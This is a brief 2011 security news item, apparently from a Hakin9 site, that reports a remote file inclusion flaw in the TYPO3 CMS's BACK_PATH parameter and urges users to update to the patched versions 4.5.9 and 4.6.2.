TYPO3 critical security flaw patched


The TYPO3 developer team have identified a critical hole in the CMS which could allow an attacker to compromise a server. Insufficient checking of the AbstractController.php file's BACK_PATH parameter enables attackers to upload and execute arbitrary PHP scripts (Remote File Inclusion). The TYPO3 developers have been informed that attackers are already trying to intrude into users' servers on a large scale. The development team have now provided a patch and released the corrected version 4.5.9 and 4.6.2. We suggest if you use TYPO3 you update with immediately.

December 20, 2011
Notify of

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023